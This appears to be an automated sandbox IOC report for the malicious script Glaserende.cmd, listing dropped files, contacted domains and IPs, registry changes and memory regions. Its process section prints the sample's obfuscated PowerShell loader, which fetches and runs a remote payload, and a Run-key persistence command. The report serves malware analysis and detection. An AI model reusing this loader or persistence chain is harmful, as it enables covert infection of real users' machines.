IOC Report
Glaserende.cmd

loading gifFilesProcessesURLsDomainsIPsRegistryMemdumps4321010010Label

Files

File Path
Type
Category
Malicious
Download
Glaserende.cmd
ASCII text, with very long lines (4140), with no line terminators
initial sample
 malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.chk
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0x01e02dcd, page size 16384, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\json[1].json
JSON data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_30i3uxfb.vvq.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m2rzauu3.iw4.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nxbv0gsu.cyb.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z5v4zydp.4l4.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BUXHK1ZJ6ID9ZXCS2SK3.temp
data
dropped
C:\Users\user\AppData\Roaming\stinko.Tet
ASCII text, with very long lines (65536), with no line terminators
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
There are 6 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Glaserende.cmd" "
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "Get-Service;$Unsegregated97='func';Get-History;$Unsegregated97+='t';Get-History;$Unsegregated97+='i';Get-History;$Unsegregated97+='on:';(ni -p $Unsegregated97 -n Desperates -value { param($Vanskeligt);$Batel=2;do {$Skraaplanernes+=$Vanskeligt[$Batel];$Batel+=3} until(!$Vanskeligt[$Batel])$Skraaplanernes});ConvertTo-Html;(ni -p $Unsegregated97 -n Afsvoret -value {param($Paliphrasia);.($Farsering) ($Paliphrasia)});ConvertTo-Html;$Fjernsynsudsendelser=Desperates 'udNHae et ..SpW';$Fjernsynsudsendelser+=Desperates 'ine bCeCAnL SiPeeH nPrT';$Shopped=Desperates 'hjMTeo VzBoiKel,ol a a/';$Livener89=Desperates 'AnTLel DsCe1 2';$Breaming=' r[ aNsiE .t .. .SH E.rrLiVUnI HcAqeN,p So.eiTonFatGem aAU NO,AStGC,EEyRDe]Gr:Pl:.xsErELic,nUXir ib,tScyT p ArTroUrTinoMaCD oS lA =Pu$ImLCoi.rVFle Sn OEBlRT.8Hl9';$Shopped+=Desperates 'Fl5 ,. s0Pe Ov(YaWReiAnn d aoRiw .sKi oNGlT r Fo1 0 l. H0Ke;S, hWfuiKnnUn6Fj4S.;Sy Anxr,6U.4 i;Sk ParRov.d: P1Le3Pu4Ao.Ep0 s)Ol S GVie AcSvkOuoEj/ C2 0 I1.e0 a0p 1 .0Un1Ov UdFTaiRerF ejefUnoWrxDd/,u1 k3U 4Th.Li0';$Batelgangstningen=Desperates 'V,UAaSSae.eRRa-AnA gMiEPiN CT';$Hepatic=Desperates ' Bh nt,rtOvpS s P:Rv/Sv/ SwFowT wIn..aaOreKununnA,aPiaP,rVat n. UdspeRe/Dow .p ,c ao hnentSpeKun,otP /Daf ti lF.eP s /MapdirTaiBevD aDatU eAl/g ddao Vw AnDel no a ndFi/ eGInlJoaFas ee MrUreGlnSudRee ,.Ruc Oh ,m';$Chatollet=Desperates 'Mo>';$Farsering=Desperates 'StIStE,iX';$Awatch='Perfideste';$aabenbaringsreligionen='\stinko.Tet';Afsvoret (Desperates 'D,$ SGAnl SO TB,paUnlV,:SnCCuAspr,aPHaeH TUnL BEFoSCiS B=do$DoeD n VS.:Soa upElpInDUnA mtY aKr+Tr$BraAdaC.bEke N,aBOrA,cR QILanTuGBrSO.r ee llH I.oGA,I.eOk n oeReN');Afsvoret (Desperates ' $ ogUpLSwo.ubNraShlSe:KlP aR.ho oC EUrDgeUR RHjE gkGlajalAndGosAg=Fi$TeHA eFopA aIsT liCacF ..aSMypAgltaIFotHe(C $ CCsthSgAT,TUno AlCulUdEP tPo)');Afsvoret (Desperates $Breaming);$Hepatic=$Procedurekalds[0];$Colberter=(Desperates 'Bo$NyG dLCho rb AASuLFr: PFSyAE rCoVInADrNSeDEkeI.=Rendee wEl-Drot b.ij tE McCrTK. Pes yRosBitFoe SMKl.R $Blf JOpE aRpoNP sSvyHanBaS.nU,rd SMeEPun FD,rEm LBes EEEnR');Afsvoret ($Colberter);Afsvoret (Desperates 'No$T F Sa ir qv Ga n odTieMa. BH oeJoaJodSlechrOpsTo[F $FeBK,aS.tIteKolCag paEnnA,gA sF,tSen liUdn og ePen L]Br= $R,SC h Ao DpBipO eE d');$Coumaphos=Desperates 'Kl$ IFUraForH v UaAcns,d.aeFi.ExD og w n ElFloSpaM dInF NiRel reSe(Ko$LkHSfe ApFoaSkt wiRec,p,Un$ .EBrfChfO r.aae y )';$Effray=$carpetless;Afsvoret (Desperates ' K$ SGUdL LO Tb FAPhlC,: UhSuaLuGBab.rUS T i=Ap(S.tgeeS,sI tS -OrpAfaMotteHVi S,$Une ,f AFRerLsa.nyBr)');while (!$Hagbut) {Afsvoret (Desperates 'Ma$YpgS lBrogebCaaInlS,: UBSklLaoBekBetStrYvyAfkSls T= e$.oD FieclS,iDeg FeA nSucU e SnSts') ;Afsvoret $Coumaphos;Afsvoret (Desperates 'Co[ToT lH rT,E,eA eD,riS nmhg f. StS HstR.ie UaStDGa]S :Br:i s ClMeEArE SpAr(M.4Ch0Tr0P.0D.)');Afsvoret (Desperates 'U $,eGS.lHjo eB eAInl r: kh aaTrgGlbAfuOlTTa=De(Frt Je,csMoTOv-U PPhAHoTFeh . Da$ Ae.lF AFCor .aImymy)') ;Afsvoret (Desperates 'St$toG,fLFaO MbR,A .l f:Dig .EN nI,A aN,rV eDon gdAnEInLCoSWoeEnn DSG =tu$MlgK lChO pb aaEflS :swsReeNolM,FslfSpuStl R+Ko+Bo% $.apUnRFoo sC LE,ed DU erUneOskI.AE Lr DHisRo. sC Sot.u rN .t') ;$Hepatic=$Procedurekalds[$Genanvendelsens]}$Tilbedt=471921;$Ungrated=28582;Afsvoret (Desperates 'Sa$gaG el hoChb saUtLdk:S,O.ePNok uaL sWaTFuE Tn rDFle s o o= B Seg UeP,TFi-LaC OGanOvTChE BNSktFl f $H e BFFyFPorO,A oY');Afsvoret (Desperates 'fo$BagdilSaoInb Ha Llvo:PaEAsnElwPrr a PpE pOmeA dF Fr=Hj [DyS ,y espytAdeS,mA..OpCtaoOznDev .eMar.otBu]Ci:Bi: rFC rReoU mMiBSeaTysteeAr6D 4 oS HtJorraiBanAbg P(,o$HuOBep kDaaGisUntRue Mn vdFoeSksSo)');Afsvoret (Desperates '.a$MigWhlP oRaB gAMaLko:skgP.g Pe Wk.oa SG Be aR,en eESwS.o D=Pi [.uS yM S mT,iE ,MPr.PotTieFeX Tkn.VrEBrn ICPaO DJeiPrNBoGMe]Al:,i:BeA .S PCSpICrIT .Nag ceB.TFasAptChr ,i.eNM GG (By$,eECaNV,W KrBeaAnPh PNaeEmDS )');Afsvoret (Desperates ' H$ gRelH O sB aN L ,:B c eRDao COk,k.vIShnLigBo= u$RygWhGReeSok EA DgpseRarN NCae.oSAt.W.S.su jbm SVitKuRS,IGrnFlg U( F$HkTLeIv.lSkbE EMaDtit a,Fo$uduP NKnGLarDeA,rT BeWodO,)');Afsvoret $Crooking;"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Unsegregated97='func';Get-History;$Unsegregated97+='t';Get-History;$Unsegregated97+='i';Get-History;$Unsegregated97+='on:';(ni -p $Unsegregated97 -n Desperates -value { param($Vanskeligt);$Batel=2;do {$Skraaplanernes+=$Vanskeligt[$Batel];$Batel+=3} until(!$Vanskeligt[$Batel])$Skraaplanernes});ConvertTo-Html;(ni -p $Unsegregated97 -n Afsvoret -value {param($Paliphrasia);.($Farsering) ($Paliphrasia)});ConvertTo-Html;$Fjernsynsudsendelser=Desperates 'udNHae et ..SpW';$Fjernsynsudsendelser+=Desperates 'ine bCeCAnL SiPeeH nPrT';$Shopped=Desperates 'hjMTeo VzBoiKel,ol a a/';$Livener89=Desperates 'AnTLel DsCe1 2';$Breaming=' r[ aNsiE .t .. .SH E.rrLiVUnI HcAqeN,p So.eiTonFatGem aAU NO,AStGC,EEyRDe]Gr:Pl:.xsErELic,nUXir ib,tScyT p ArTroUrTinoMaCD oS lA =Pu$ImLCoi.rVFle Sn OEBlRT.8Hl9';$Shopped+=Desperates 'Fl5 ,. s0Pe Ov(YaWReiAnn d aoRiw .sKi oNGlT r Fo1 0 l. H0Ke;S, hWfuiKnnUn6Fj4S.;Sy Anxr,6U.4 i;Sk ParRov.d: P1Le3Pu4Ao.Ep0 s)Ol S GVie AcSvkOuoEj/ C2 0 I1.e0 a0p 1 .0Un1Ov UdFTaiRerF ejefUnoWrxDd/,u1 k3U 4Th.Li0';$Batelgangstningen=Desperates 'V,UAaSSae.eRRa-AnA gMiEPiN CT';$Hepatic=Desperates ' Bh nt,rtOvpS s P:Rv/Sv/ SwFowT wIn..aaOreKununnA,aPiaP,rVat n. UdspeRe/Dow .p ,c ao hnentSpeKun,otP /Daf ti lF.eP s /MapdirTaiBevD aDatU eAl/g ddao Vw AnDel no a ndFi/ eGInlJoaFas ee MrUreGlnSudRee ,.Ruc Oh ,m';$Chatollet=Desperates 'Mo>';$Farsering=Desperates 'StIStE,iX';$Awatch='Perfideste';$aabenbaringsreligionen='\stinko.Tet';Afsvoret (Desperates 'D,$ SGAnl SO TB,paUnlV,:SnCCuAspr,aPHaeH TUnL BEFoSCiS B=do$DoeD n VS.:Soa upElpInDUnA mtY aKr+Tr$BraAdaC.bEke N,aBOrA,cR QILanTuGBrSO.r ee llH I.oGA,I.eOk n oeReN');Afsvoret (Desperates ' $ ogUpLSwo.ubNraShlSe:KlP aR.ho oC EUrDgeUR RHjE gkGlajalAndGosAg=Fi$TeHA eFopA aIsT liCacF ..aSMypAgltaIFotHe(C $ CCsthSgAT,TUno AlCulUdEP tPo)');Afsvoret (Desperates $Breaming);$Hepatic=$Procedurekalds[0];$Colberter=(Desperates 'Bo$NyG dLCho rb AASuLFr: PFSyAE rCoVInADrNSeDEkeI.=Rendee wEl-Drot b.ij tE McCrTK. Pes yRosBitFoe SMKl.R $Blf JOpE aRpoNP sSvyHanBaS.nU,rd SMeEPun FD,rEm LBes EEEnR');Afsvoret ($Colberter);Afsvoret (Desperates 'No$T F Sa ir qv Ga n odTieMa. BH oeJoaJodSlechrOpsTo[F $FeBK,aS.tIteKolCag paEnnA,gA sF,tSen liUdn og ePen L]Br= $R,SC h Ao DpBipO eE d');$Coumaphos=Desperates 'Kl$ IFUraForH v UaAcns,d.aeFi.ExD og w n ElFloSpaM dInF NiRel reSe(Ko$LkHSfe ApFoaSkt wiRec,p,Un$ .EBrfChfO r.aae y )';$Effray=$carpetless;Afsvoret (Desperates ' K$ SGUdL LO Tb FAPhlC,: UhSuaLuGBab.rUS T i=Ap(S.tgeeS,sI tS -OrpAfaMotteHVi S,$Une ,f AFRerLsa.nyBr)');while (!$Hagbut) {Afsvoret (Desperates 'Ma$YpgS lBrogebCaaInlS,: UBSklLaoBekBetStrYvyAfkSls T= e$.oD FieclS,iDeg FeA nSucU e SnSts') ;Afsvoret $Coumaphos;Afsvoret (Desperates 'Co[ToT lH rT,E,eA eD,riS nmhg f. StS HstR.ie UaStDGa]S :Br:i s ClMeEArE SpAr(M.4Ch0Tr0P.0D.)');Afsvoret (Desperates 'U $,eGS.lHjo eB eAInl r: kh aaTrgGlbAfuOlTTa=De(Frt Je,csMoTOv-U PPhAHoTFeh . Da$ Ae.lF AFCor .aImymy)') ;Afsvoret (Desperates 'St$toG,fLFaO MbR,A .l f:Dig .EN nI,A aN,rV eDon gdAnEInLCoSWoeEnn DSG =tu$MlgK lChO pb aaEflS :swsReeNolM,FslfSpuStl R+Ko+Bo% $.apUnRFoo sC LE,ed DU erUneOskI.AE Lr DHisRo. sC Sot.u rN .t') ;$Hepatic=$Procedurekalds[$Genanvendelsens]}$Tilbedt=471921;$Ungrated=28582;Afsvoret (Desperates 'Sa$gaG el hoChb saUtLdk:S,O.ePNok uaL sWaTFuE Tn rDFle s o o= B Seg UeP,TFi-LaC OGanOvTChE BNSktFl f $H e BFFyFPorO,A oY');Afsvoret (Desperates 'fo$BagdilSaoInb Ha Llvo:PaEAsnElwPrr a PpE pOmeA dF Fr=Hj [DyS ,y espytAdeS,mA..OpCtaoOznDev .eMar.otBu]Ci:Bi: rFC rReoU mMiBSeaTysteeAr6D 4 oS HtJorraiBanAbg P(,o$HuOBep kDaaGisUntRue Mn vdFoeSksSo)');Afsvoret (Desperates '.a$MigWhlP oRaB gAMaLko:skgP.g Pe Wk.oa SG Be aR,en eESwS.o D=Pi [.uS yM S mT,iE ,MPr.PotTieFeX Tkn.VrEBrn ICPaO DJeiPrNBoGMe]Al:,i:BeA .S PCSpICrIT .Nag ceB.TFasAptChr ,i.eNM GG (By$,eECaNV,W KrBeaAnPh PNaeEmDS )');Afsvoret (Desperates ' H$ gRelH O sB aN L ,:B c eRDao COk,k.vIShnLigBo= u$RygWhGReeSok EA DgpseRarN NCae.oSAt.W.S.su jbm SVitKuRS,IGrnFlg U( F$HkTLeIv.lSkbE EMaDtit a,Fo$uduP NKnGLarDeA,rT BeWodO,)');Afsvoret $Crooking;"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Mystery" /t REG_EXPAND_SZ /d "%Sundhedstjeneste% -windowstyle 1 $Uforligneliges155=(gi 'HKCU:\Software\Rnefolk\').GetValue('Noncooperation');%Sundhedstjeneste% ($Uforligneliges155)"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Mystery" /t REG_EXPAND_SZ /d "%Sundhedstjeneste% -windowstyle 1 $Uforligneliges155=(gi 'HKCU:\Software\Rnefolk\').GetValue('Noncooperation');%Sundhedstjeneste% ($Uforligneliges155)"

URLs

Name
IP
Malicious
www.vzprojekti.com
malicious
www.porsche-augsbrug.de
malicious
http://nuget.org/NuGet.exe
unknown
https://www.aennaart.de/wpcontent/files/private/download/Glaserende.chmP
unknown
http://pesterbdd.com/images/Pester.png
unknown
https://thevisionofenergy.de/wp-admin/css/colors/blue/dRzmPWAwIjx42.bin
85.13.130.155
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://crl.ver)
unknown
https://aka.ms/pscore6lBLr
unknown
https://g.live.com/odclientsettings/ProdV2/C:
unknown
http://geoplugin.net/json.gpv
unknown
https://thevisionofenergy.de/wp-admin/css/colors/blue/dRzmPWAwIjx42.binokP_
unknown
https://www.aennaart.de/wpcontent/files/private/download/Glaserende.chmXR
unknown
https://github.com/Pester/Pester
unknown
http://geoplugin.net/json.gp
178.237.33.50
https://g.live.com/odclientsettings/Prod/C:
unknown
https://www.aennaart.de/wpcontent/files/private/download/Glaserende.chm
217.160.0.61
https://thevisionofenergy.de/wp-admin/css/colors/blue/dRzmPWAwIjx42.binStofsHemwww.klueverimmo.de/wp
unknown
http://geoplugin.net/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://thevisionofenergy.de/
unknown
http://geoplugin.net/json.gpCvC
unknown
http://geoplugin.net/json.gp04Zvh
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://www.aennaart.de
unknown
https://www.aennaart.de
unknown
There are 20 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
www.vzprojekti.com
196.251.85.7
 malicious
thevisionofenergy.de
85.13.130.155
www.aennaart.de
217.160.0.61
geoplugin.net
178.237.33.50

IPs

IP
Domain
Country
Malicious
196.251.85.7
www.vzprojekti.com
Seychelles
malicious
85.13.130.155
thevisionofenergy.de
Germany
178.237.33.50
geoplugin.net
Netherlands
127.0.0.1
unknown
unknown
217.160.0.61
www.aennaart.de
Germany

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Rnefolk
Noncooperation
HKEY_CURRENT_USER\Environment
Sundhedstjeneste
HKEY_CURRENT_USER\SOFTWARE\Neleu8263scah-9YRWAH
exepath
HKEY_CURRENT_USER\SOFTWARE\Neleu8263scah-9YRWAH
licence
HKEY_CURRENT_USER\SOFTWARE\Neleu8263scah-9YRWAH
time
HKEY_CURRENT_USER\SOFTWARE\Neleu8263scah-9YRWAH
UID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Mystery
There are 14 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
Download
8304000
heap
page read and write
 malicious
82A6000
heap
page read and write
 malicious
2B83000
heap
page read and write
 malicious
832C000
heap
page read and write
 malicious
1CDD977000
stack
page read and write
2A50000
heap
page read and write
1E6B21B0000
heap
page read and write
5B07000
trusted library allocation
page read and write
1E697F90000
heap
page read and write
2AE0000
direct allocation
page read and write
7FF9368D0000
trusted library allocation
page read and write
6F20000
direct allocation
page read and write
1E69BB18000
trusted library allocation
page read and write
2DE0000
trusted library allocation
page read and write
80A0000
heap
page read and write
1E6B21D5000
heap
page read and write
1E699870000
heap
page readonly
1E699E50000
heap
page read and write
2E20000
trusted library allocation
page read and write
2E99000
heap
page read and write
7FF9367E6000
trusted library allocation
page read and write
7FF936A50000
trusted library allocation
page read and write
1B262513000
heap
page read and write
1E697E85000
heap
page read and write
1B267B02000
heap
page read and write
724A000
heap
page read and write
2A60000
direct allocation
page read and write
1B267950000
trusted library allocation
page read and write
2A90000
direct allocation
page read and write
2E80000
trusted library allocation
page execute and read and write
1E69A6BB000
trusted library allocation
page read and write
7580000
trusted library allocation
page read and write
1B267A55000
heap
page read and write
2DD4000
trusted library allocation
page read and write
2DDD000
trusted library allocation
page execute and read and write
1E6AA000000
trusted library allocation
page read and write
1B267921000
trusted library allocation
page read and write
8640000
trusted library allocation
page execute and read and write
2A20000
heap
page read and write
7FF9367E0000
trusted library allocation
page read and write
7FF936940000
trusted library allocation
page read and write
1E697E83000
heap
page read and write
1B262400000
heap
page read and write
1E69A984000
trusted library allocation
page read and write
1E69ADBD000
trusted library allocation
page read and write
1B263240000
trusted library allocation
page read and write
1B267A62000
heap
page read and write
FD087E000
unkown
page readonly
1B262517000
heap
page read and write
1B267C70000
trusted library allocation
page read and write
8270000
heap
page read and write
1E6B20D0000
heap
page read and write
A254000
direct allocation
page execute and read and write
53EE000
trusted library allocation
page read and write
1B267CC0000
remote allocation
page read and write
1E69ADA4000
trusted library allocation
page read and write
1B262490000
heap
page read and write
2E90000
heap
page read and write
1B267C30000
trusted library allocation
page read and write
5961000
trusted library allocation
page read and write
8E54000
direct allocation
page execute and read and write
7FF93673D000
trusted library allocation
page execute and read and write
1E6AA299000
trusted library allocation
page read and write
2D70000
heap
page read and write
7570000
trusted library allocation
page read and write
7530000
trusted library allocation
page read and write
73D0000
trusted library allocation
page read and write
1B267900000
trusted library allocation
page read and write
1E699E24000
heap
page read and write
863E000
stack
page read and write
4950000
heap
page execute and read and write
1E699E11000
heap
page read and write
47DF000
stack
page read and write
715E000
stack
page read and write
4AB6000
trusted library allocation
page read and write
1B267989000
trusted library allocation
page read and write
1E69AECD000
trusted library allocation
page read and write
1E6A9FA0000
trusted library allocation
page read and write
71E9000
heap
page read and write
1E697E3D000
heap
page read and write
1E699860000
trusted library allocation
page read and write
2DB0000
trusted library allocation
page read and write
2AA0000
heap
page read and write
6BE000
stack
page read and write
80C0000
trusted library allocation
page read and write
2D50000
direct allocation
page read and write
1E6B225E000
heap
page read and write
702000
heap
page read and write
1B262494000
heap
page read and write
7FF936A10000
trusted library allocation
page read and write
7257000
heap
page read and write
2B4F000
heap
page read and write
1B26242B000
heap
page read and write
489D000
stack
page read and write
1B267A70000
trusted library allocation
page read and write
7FF936950000
trusted library allocation
page read and write
2D30000
direct allocation
page read and write
2D20000
direct allocation
page read and write
1B267B06000
heap
page read and write
1B26245B000
heap
page read and write
467E000
stack
page read and write
AE47000
trusted library allocation
page read and write
FCFE8B000
stack
page read and write
7DF486450000
trusted library allocation
page execute and read and write
1CDD87E000
stack
page read and write
7510000
trusted library allocation
page execute and read and write
5B0D000
trusted library allocation
page read and write
1CDD6FE000
stack
page read and write
1B262473000
heap
page read and write
1B262F00000
trusted library allocation
page read and write
1E69A01C000
trusted library allocation
page read and write
2D10000
direct allocation
page read and write
1B267A2F000
heap
page read and write
7FF936AC0000
trusted library allocation
page read and write
1CDDA37000
stack
page read and write
1B262D13000
heap
page read and write
1E697E90000
heap
page read and write
27D8000
stack
page read and write
630000
heap
page read and write
FD0477000
stack
page read and write
1B262502000
heap
page read and write
1E6B229E000
heap
page read and write
6E0000
heap
page read and write
1B263480000
trusted library allocation
page read and write
1E69AE99000
trusted library allocation
page read and write
2E6E000
stack
page read and write
80E9000
trusted library allocation
page read and write
4910000
direct allocation
page read and write
1B267A43000
heap
page read and write
1E698010000
heap
page read and write
7FF936A70000
trusted library allocation
page read and write
1E697DA5000
heap
page read and write
7520000
trusted library allocation
page read and write
7FF936980000
trusted library allocation
page read and write
2CFE000
stack
page read and write
7FF936A20000
trusted library allocation
page read and write
1E6998B0000
trusted library allocation
page read and write
8660000
trusted library allocation
page read and write
1E697FD0000
heap
page read and write
2AA7000
heap
page read and write
1E699DB0000
heap
page read and write
4920000
direct allocation
page read and write
1B262529000
heap
page read and write
1B2623A0000
trusted library allocation
page read and write
80F0000
trusted library allocation
page read and write
8090000
heap
page read and write
1B267ADD000
heap
page read and write
7550000
trusted library allocation
page read and write
7FF936AA0000
trusted library allocation
page read and write
8130000
trusted library allocation
page read and write
48DC000
stack
page read and write
1E69ADB4000
trusted library allocation
page read and write
7FF936930000
trusted library allocation
page read and write
1E6998F0000
trusted library allocation
page read and write
7FF936990000
trusted library allocation
page read and write
6F30000
heap
page read and write
1CDE88D000
stack
page read and write
1CDD36E000
stack
page read and write
4961000
trusted library allocation
page read and write
1B267AF4000
heap
page read and write
827B000
heap
page read and write
471E000
stack
page read and write
1E69A533000
trusted library allocation
page read and write
1B262370000
heap
page read and write
2C10000
heap
page read and write
7FF936915000
trusted library allocation
page read and write
FD0F7B000
stack
page read and write
1B2624FF000
heap
page read and write
1E6B2268000
heap
page read and write
1E6B222C000
heap
page read and write
1B267922000
trusted library allocation
page read and write
7FF93674B000
trusted library allocation
page read and write
2E00000
trusted library allocation
page read and write
1B262D1A000
heap
page read and write
86F0000
trusted library allocation
page execute and read and write
1B262413000
heap
page read and write
8500000
trusted library allocation
page read and write
74ED000
stack
page read and write
2A80000
direct allocation
page read and write
5C4E000
trusted library allocation
page read and write
82C6000
heap
page read and write
1CDDAB9000
stack
page read and write
80D0000
trusted library allocation
page read and write
1B262D00000
heap
page read and write
1E698030000
heap
page read and write
6D0000
heap
page read and write
1B268000000
heap
page read and write
1B262C00000
heap
page read and write
721A000
heap
page read and write
2B10000
heap
page read and write
1CDE78F000
stack
page read and write
1CDDDBB000
stack
page read and write
2B88000
heap
page read and write
2D90000
trusted library section
page read and write
1CDD67E000
stack
page read and write
1B267AE9000
heap
page read and write
1E6AA27B000
trusted library allocation
page read and write
7FB7000
stack
page read and write
FD107E000
unkown
page readonly
1E6B229A000
heap
page read and write
75E0000
trusted library allocation
page read and write
7FF936960000
trusted library allocation
page read and write
2A70000
direct allocation
page read and write
84B0000
direct allocation
page read and write
59C8000
trusted library allocation
page read and write
276D000
stack
page read and write
1E6B20B0000
heap
page read and write
1B262502000
heap
page read and write
1E699940000
heap
page read and write
481E000
stack
page read and write
7FF936740000
trusted library allocation
page read and write
2D40000
direct allocation
page read and write
1E697D90000
heap
page read and write
2E05000
trusted library allocation
page execute and read and write
1E6B22A6000
heap
page read and write
1B262506000
heap
page read and write
FD0C7E000
unkown
page readonly
FD077E000
stack
page read and write
1B267AF1000
heap
page read and write
7223000
heap
page read and write
1B267A80000
trusted library allocation
page read and write
1B2624FF000
heap
page read and write
75D0000
trusted library allocation
page read and write
7FC0000
trusted library allocation
page execute and read and write
8254000
trusted library allocation
page read and write
251AD000
stack
page read and write
479E000
stack
page read and write
1E69AC4C000
trusted library allocation
page read and write
2F10000
heap
page read and write
808E000
stack
page read and write
49BF000
trusted library allocation
page read and write
2B80000
heap
page read and write
2DE9000
trusted library allocation
page read and write
1E699DC0000
heap
page read and write
1B267920000
trusted library allocation
page read and write
1B267F80000
trusted library allocation
page read and write
1CDE90A000
stack
page read and write
1B267EF0000
trusted library allocation
page read and write
2CE0000
direct allocation
page read and write
7FE0000
trusted library allocation
page read and write
1B267C00000
trusted library allocation
page read and write
7560000
trusted library allocation
page read and write
6C0000
heap
page read and write
6F40000
heap
page read and write
71EB000
heap
page read and write
2CD000
stack
page read and write
75B0000
trusted library allocation
page read and write
7FF9369D0000
trusted library allocation
page read and write
1E697E57000
heap
page read and write
3CD000
stack
page read and write
1B267910000
trusted library allocation
page read and write
2E70000
heap
page readonly
7FF936920000
trusted library allocation
page execute and read and write
2AD0000
direct allocation
page read and write
1CDDC3E000
stack
page read and write
1CDD8FC000
stack
page read and write
1CDDCBE000
stack
page read and write
1B267CC0000
remote allocation
page read and write
726B000
heap
page read and write
2AC0000
direct allocation
page read and write
1E697E21000
heap
page read and write
2DD0000
trusted library allocation
page read and write
1E6B20A7000
heap
page execute and read and write
1E699E4E000
heap
page read and write
1B2624A0000
heap
page read and write
1CDDB39000
stack
page read and write
1E69A1BB000
trusted library allocation
page read and write
2E02000
trusted library allocation
page read and write
1B267950000
trusted library allocation
page read and write
1B26248E000
heap
page read and write
1B262D04000
heap
page read and write
2B6E000
stack
page read and write
879C000
stack
page read and write
1E69AEAC000
trusted library allocation
page read and write
1B262C15000
heap
page read and write
1B267C10000
trusted library allocation
page read and write
1B262BC1000
trusted library allocation
page read and write
1E697E3B000
heap
page read and write
73E0000
heap
page execute and read and write
5989000
trusted library allocation
page read and write
1B267991000
trusted library allocation
page read and write
7FF936912000
trusted library allocation
page read and write
2DFA000
trusted library allocation
page execute and read and write
74AE000
stack
page read and write
FD22FE000
stack
page read and write
2A10000
heap
page read and write
2DD3000
trusted library allocation
page execute and read and write
705000
heap
page read and write
1E699C9D000
heap
page read and write
